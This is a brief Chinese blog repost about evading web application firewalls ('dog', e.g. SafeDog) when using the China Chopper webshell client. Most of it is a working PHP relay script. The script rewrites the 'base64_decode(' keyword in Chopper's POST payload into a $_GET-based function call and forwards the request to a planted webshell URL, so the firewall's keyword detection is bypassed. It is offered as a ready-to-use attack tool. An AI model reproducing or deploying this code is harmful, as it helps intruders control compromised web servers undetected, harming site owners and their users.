菜刀杀狗

来源:互联网 发布:古装网络剧2017 编辑:程序博客网 时间:2024/06/11 03:40

中转是一种思路,把狗拦截的关键字以一种等效的方式替换为其他的。

<?php $webshell="http://www.example.com/1.php";//把这里改成你的shell地址 $webshell=$webshell."?&1141056911=base64_decode"; $da=$_POST; $data = $da; @$data=str_replace("base64_decode(",'$_GET[1141056911](',$data); //接收菜刀的post,并把base64_decode替换成$_GET[1141056911]( //print_r($data);  $data = http_build_query($data);   $opts = array (   'http' => array (   'method' => "POST",   'header'=> "Content-type: application/x-www-form-urlencoded\r\n" .              "Content-Length: " . strlen($data) . "\r\n",   'content' => $data) );  $context = stream_context_create($opts);   $html = @file_get_contents($webshell, false, $context); //发送post  echo $html;    ?>

原文:http://zone.wooyun.org/content/10278


0 0
原创粉丝点击